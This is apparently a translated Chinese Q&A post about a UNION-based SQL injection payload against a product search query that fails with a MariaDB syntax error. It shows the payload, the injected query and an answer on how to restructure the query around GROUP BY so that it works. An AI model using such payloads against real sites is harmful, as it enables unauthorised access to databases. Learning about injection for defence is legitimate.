[我正在尝试测试有关sql注入的教育项目,但我对此仍然坚持,发现了一些有用的文章和问题,甚至还有stackoverflow,但都无济于事,请您告诉我这段代码有什么问题吗?
SELECT pp.product_id, pp.product_price AS product_price,
pp.product_name AS product_name, pp.quantity, pp.main_image,
pp.sale, pp.sale_price, pi.hash, pi.ext
FROM presto_products pp
LEFT JOIN presto_product_images pi ON pi.product_id = pp.product_id
AND pi.del = 0
AND pi.tab = 0
WHERE pp. del = 0
AND pp.product_price IS NOT NULL
AND pp.product_price != 0
AND pp.publish = 1
AND ( pp.product_name LIKE '%swiss nano%' )
AND 1=2
UNION ALL
SELECT 1,2,3,4,5,6,7,8,9 -- - %'
OR pp.barcode LIKE '%swiss nano%' )
AND 1=2
UNION ALL
SELECT 1,2,3,4,5,6,7,8,9 -- - %' )
GROUP BY pp.product_id
这是一条错误消息:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'GROUP BY pp.product_id'
这是常规搜索的常规查询,例如,搜索关键字是否为'swiss':
SELECT pp.product_id, pp.product_price
AS product_price, pp.product_name
AS product_name, pp.quantity, pp.main_image, pp.sale, pp.sale_price, pi.hash,
pi.ext
FROM presto_products pp
LEFT JOIN presto_product_images pi
ON pi.product_id = pp.product_id
AND pi.del = 0 AND pi.tab = 0
WHERE pp.del = 0k
AND pp.product_price IS NOT NULL
AND pp.product_price != 0 AND pp.publish = 1
AND ( pp.product_name LIKE '%SWISS%' OR pp.barcode LIKE '%SWISS%' )
GROUP BY pp.product_id
这也是我的有效载荷:
swiss nano%' ) AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9 -- -
如果您认为GROUP BY pp.product_id应用于所有3个联合查询的结果,那么您是错误的。它仅适用于没有FROM子句且当然GROUP BY无效的最后一个查询。您可以做的是将查询用作子查询:
select t.product_id, .........
from (
<your query here>
) t
group by t.product_id